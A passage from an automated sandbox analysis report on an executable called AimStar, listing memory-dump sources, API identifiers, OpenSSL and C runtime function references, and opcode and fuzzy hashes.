                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                                          • API String ID: 1452528299-1722249466
                                                                                                                                                                                                                                          • Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                          • Instruction ID: c44d7131be85151bdfc8df9a0bdac41448c28bd669d202b706806a62f1f2b3d1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3A1A625A0EED3A5FB649E25D4413BD22F4EF61BC4F686031DA0DC66CACE7CE8418B51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
                                                                                                                                                                                                                                          • API String ID: 1452528299-1219543453
                                                                                                                                                                                                                                          • Opcode ID: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                          • Instruction ID: e45d10cc4133dc210498c93d6af8e9d869a76598930113be7c579be29106ca97
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b41cf49d76ee813241620147cb438b9269980a246317de21737170a9b88665e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7419C61A0EEC1A2EB549F15D4403A9B3B0FB40BC4F24A135DA0D8BBA5EF7DE4518704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                                          • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                          • Instruction ID: f86debf643235593b7be9c14e733410fa1d33e0e6414d0b660a82ef33f0312fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F314B24E0CD4A41FA94BB249413BB9A7A99F82364FC41435DD4E873D7DE2CB54DC2B0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                          • Instruction ID: 4415d54d0e9112cf570ce86f7bdd0eada1020eec1386451ce365590b03d77549
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA510721B0DE4286E624BA25940267AE6A9BF44BB4F944734FD6D077C5CF3CF609C620
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                          • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                          • Instruction ID: aef44f2f5366f79e8214a64a47ab3388f90d106056455035c87d1f75997280f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7811016170CE8585DA10AB25A805169A765BB45BF4FA40331EE7E4B7E9CE3CE149C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00007FF710F5AA45,?,?,00000000,00007FF710F5AAFA), ref: 00007FF710F5AC36
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF710F5AA45,?,?,00000000,00007FF710F5AAFA), ref: 00007FF710F5AC40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                                          • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                          • Instruction ID: 1048a9ef22b1386a641669696459e8910cb824b636df09723529b7f1934003eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7421F621F1CF4202FB947761A49627DA6AA9F847B0F984235D91E473C1CE6CF55DC320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                          • Instruction ID: aa72ee2592d382dd08425d545d729f8931765502da21ca7784fd98ff4e1ff4b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B41FA3290CA0587EA34EB55A442279F3B8EB55B64F900231D68E837D1CF2DF60ACB61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                                          • Opcode ID: e92a0dc91ef26cdd8f9e6f352d981f45ea0274e7df9581e9684e5913da368228
                                                                                                                                                                                                                                          • Instruction ID: 1a419967110c828ae5f09544322849f4f73aa95bdf616ce36ed783d756fdebf9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e92a0dc91ef26cdd8f9e6f352d981f45ea0274e7df9581e9684e5913da368228
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB21B421B1CE9145FA10BA1665067BAD659BF45BE4FCC4430EE0D47786DE3DF14EC620
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                          • Instruction ID: d256453a2c421d75ce99b316cd917a00d1563a8c4ac9bc046f766115c415cc2b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4316D21A1CE4685E7517B5598432BCA6B8AF40BB4FC20135EA2D133D2DF7CB64ACB31
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction ID: 112694b0c182173f9853aebfcad77bc136b04b966ce9d1756f840c6b9624079c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE115022A1CA4142EA60BF51A41617DF2B8AF45FA4FC44031EB4C97B96DF3CF648C720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                          • Instruction ID: c1dd9f59005675640eeff9b239c71591a89f5c2ba31457f648358fb3adfbc96f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E21957661CE4186D761AF18D482379B6A4EB88B64F944234E69D477D5DF3CE408CB10
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2830847230-0
                                                                                                                                                                                                                                          • Opcode ID: f8ecf692f3926781a35c14d99b3f9fd829dd50894e5b6194ab5df3d00d2e06be
                                                                                                                                                                                                                                          • Instruction ID: de6d157daaf1f00bccf3d7bf36af743d50ef40090b7935f7189f5db6607c22aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8ecf692f3926781a35c14d99b3f9fd829dd50894e5b6194ab5df3d00d2e06be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2411E331B4E68250FF9D9716A2446BD9351DF65FC4F082035EE4D0BB89EF2CE4824718
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction ID: 10718e271cad2a571baf90d70102e54687d9dab54d5bfaaffa5820a2cb728e7d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401A121A0CF8141EA04EF529912069E6A9AF85FF0F884631EE5C57BD6CE3CF645C310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F49400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF710F445E4,00000000,00007FF710F41985), ref: 00007FF710F49439
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00007FF710F46466,?,00007FF710F4336E), ref: 00007FF710F49092
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2592636585-0
                                                                                                                                                                                                                                          • Opcode ID: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
                                                                                                                                                                                                                                          • Instruction ID: 006f608e0c2231c8ac34c35ccd8d2803dc766936af4755f38da3caf0b9aa0ada
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AD08C11B2CA4541EA54B76BBA4762A9255AB89BD4E88C035EE0D03B5ADC3CE0868B00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                          • Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                          • Instruction ID: 168e3f087d5738e38a1f486b50f276cbc320d983236d1f82efa22bcded6896cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB217432A0CBC196E3549F26A58076AB2A9FB84BD4F144135EB9D43F99CF7CD451CB04
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
